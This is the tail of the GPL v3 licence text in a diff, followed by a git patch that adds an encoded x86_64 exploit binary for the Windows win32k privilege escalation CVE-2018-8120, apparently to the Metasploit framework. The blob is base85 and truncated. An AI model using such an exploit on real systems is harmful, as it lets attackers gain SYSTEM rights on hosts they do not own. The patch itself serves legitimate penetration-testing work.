+ + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. 
+ + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. 
+ + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. 
If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. + + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. 
If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. 
+ + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. 
For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. 
+ + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. 
You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Use with the GNU Affero General Public License. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU Affero General Public License into a single +combined work, and to convey the resulting work. 
The terms of this +License will continue to apply to the part which is the covered work, +but the special requirements of the GNU Affero General Public License, +section 13, concerning interaction through a network will apply to the +combination as such. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. 
THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. + + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. 
+
+
+ Copyright (C)
+
+ This program is free software: you can redistribute it and/or modify
+ it under the terms of the GNU General Public License as published by
+ the Free Software Foundation, either version 3 of the License, or
+ (at your option) any later version.
+
+ This program is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ GNU General Public License for more details.
+
+ You should have received a copy of the GNU General Public License
+ along with this program. If not, see .
+
+Also add information on how to contact you by electronic and paper mail.
+
+ If the program does terminal interaction, make it output a short
+notice like this when it starts in an interactive mode:
+
+ Copyright (C)
+ This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
+ This is free software, and you are welcome to redistribute it
+ under certain conditions; type `show c' for details.
+
+The hypothetical commands `show w' and `show c' should show the appropriate
+parts of the General Public License. Of course, your program's commands
+might be different; for a GUI interface, you would use an "about box".
+
+ You should also get your employer (if you work as a programmer) or school,
+if any, to sign a "copyright disclaimer" for the program, if necessary.
+For more information on this, and how to apply and follow the GNU GPL, see
+.
+
+ The GNU General Public License does not permit incorporating your program
+into proprietary programs. If your program is a subroutine library, you
+may consider it more useful to permit linking proprietary applications with
+the library. If this is what you want to do, use the GNU Lesser General
+Public License instead of this License. But first, please read
+.
From a67122aaf7ebfe057481ca56bf9a2941a2fb7381 Mon Sep 17 00:00:00 2001
From: Shelby Pace
Date: Thu, 11 Oct 2018 12:37:51 -0500
Subject: [PATCH 32/39] updated doc, added x86_64 binary
---
.../CVE-2018-8120/CVE-2018-8120x86_64.exe | Bin 0 -> 83456 bytes
.../windows/local/ms18_8120_win32k_privesc.md | 10 +++++-----
.../windows/local/ms18_8120_win32k_privesc.rb | 6 +++++-
3 files changed, 10 insertions(+), 6 deletions(-)
create mode 100755 data/exploits/CVE-2018-8120/CVE-2018-8120x86_64.exe
diff --git a/data/exploits/CVE-2018-8120/CVE-2018-8120x86_64.exe b/data/exploits/CVE-2018-8120/CVE-2018-8120x86_64.exe new file mode 100755 index 0000000000000000000000000000000000000000..e39c4c076fcd935f4cd2c26187f922233f8e2d44 GIT binary patch literal 83456 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 
